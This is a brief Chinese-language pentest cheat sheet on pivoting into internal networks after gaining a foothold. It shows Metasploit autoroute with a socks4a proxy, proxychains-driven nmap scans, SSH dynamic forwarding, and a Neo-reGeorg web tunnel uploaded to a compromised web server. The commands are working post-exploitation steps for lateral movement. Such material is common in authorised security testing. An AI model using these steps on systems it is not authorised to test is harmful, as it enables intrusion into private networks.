1.msf跳板代理功能
获取到msf的shell后操作下面命令 获取网络接口,网卡信息:run get_local_subnets 查看路由地址:run autoroute -p 添加路由地址:run autoroute -s 192.168.22.0/24 返回上一级后台运行shell:backgroud 开启本地代理: use auxiliary/server/socks4a set srvport 2222 exploit 成功开启本机2222端口代理到目标主机 配置proxychains后调用工具探针Target2 在 /etc/proxychains.conf 下面加上一行:socks4 192.168.76.132 2222 用代理打开nmap:proxychains4 nmap -sT -Pn 192.168.22.0/24 -p80
2.简单的一个建立socks工具
https://github.com/esrrhs/socksserver
./socksserver -l :4455
3.ssh
socks5代理
ssh -CfNg -D 8000 root@ip //root@ip是需要和谁连接的凭据
4.cs中的代理功能
5.冰蝎自带的网页代理
6.Neo-reGeorg内网穿透
项目地址 https://github.com/L-codes/Neo-reGeorg 使用: 设置密码: python neoreg.py generate -k password 使用 neoreg.py 连接 WEB 服务器,在本地建立 socks5 代理 python neoreg.py -k password -u http://xx/tunnel.php
修改vi /etc/proxychains4.conf后添加:
socks5 127.0.0.1 1080
使用:proxychains nmap 10.1.1.1